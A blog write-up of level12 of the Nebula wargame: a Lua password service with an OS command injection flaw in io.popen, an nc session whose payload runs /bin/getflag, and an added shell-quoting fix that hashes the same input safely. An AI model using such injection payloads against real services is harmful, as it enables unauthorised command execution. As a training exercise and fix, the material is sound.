Friday, November 2, 2012

exploit-exercises Nebula: level12

This time it is level12 of the Nebula wargame. The source code of flag12 is provided:

    local socket = require("socket")
    local server = assert(socket.bind("127.0.0.1", 50001))

    function hash(password)
      -- password is concatenated, unescaped, into a shell command line
      prog = io.popen("echo "..password.." | sha1sum", "r")
      data = prog:read("*all")
      prog:close()
      data = string.sub(data, 1, 40)
      return data
    end

    while 1 do
      local client = server:accept()
      client:send("Password: ")
      client:settimeout(60)
      local line, err = client:receive()
      if not err then
        print("trying " .. line) -- log from where ;\
        local h = hash(line)
        if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
          client:send("Better luck next time\n");
        else
          client:send("Congrats, your token is 413**CARRIER LOST**\n")
        end
      end
      client:close()
    end

Not much explanation is needed for this challenge. We have an OS command injection vulnerability: the password is concatenated into the shell command that hash() passes to io.popen. We will exploit it by terminating the echo command, executing /bin/getflag, and commenting out the remaining part of the command.

    level12@nebula:~$ nc localhost 50001
    Password: "";/bin/getflag > /tmp/pwnie12;#
    Better luck next time
    level12@nebula:~$ cat /tmp/pwnie12
    You have successfully executed getflag on a target account
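
The same hash() with the client's line shell-quoted before it reaches io.popen, so the input from the session above is hashed as data instead of being parsed as commands. This is an added example, not code from the original post or from Nebula; shell_quote and safe_hash are hypothetical names, and it assumes a POSIX sh and sha1sum.

```lua
-- Added example, not part of the original post. shell_quote and safe_hash
-- are hypothetical names; a POSIX sh and sha1sum are assumed.

-- Quote s as one POSIX sh word. Nothing is special inside single quotes,
-- so only an embedded ' needs care: close the quote, emit \', reopen.
local function shell_quote(s)
  -- A NUL byte would cut short the C string that popen() receives.
  if s:find("\0", 1, true) then
    return nil, "NUL byte in input"
  end
  return "'" .. (s:gsub("'", "'\\''")) .. "'"
end

-- Same digest as flag12's hash() for a password with no shell
-- metacharacters, whitespace runs or backslashes: text plus one newline.
local function safe_hash(password)
  local quoted, err = shell_quote(password)
  if not quoted then
    return nil, err
  end
  local prog = assert(io.popen("printf '%s\\n' " .. quoted .. " | sha1sum", "r"))
  local data = prog:read("*all")
  prog:close()
  return string.sub(data, 1, 40)
end

-- Constructed inputs: a plain word, a word with a quote, and the line
-- sent in the post's nc session. Each is hashed as data; nothing runs.
local inputs = {
  "hunter2",
  "it's",
  '"";/bin/getflag > /tmp/pwnie12;#',
}
for _, line in ipairs(inputs) do
  print(shell_quote(line), safe_hash(line))
end
```

Hashing in-process with a SHA-1 library avoids the shell altogether; quoting is shown here because stock Lua has neither a SHA-1 function nor a way to start a process without going through the shell.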
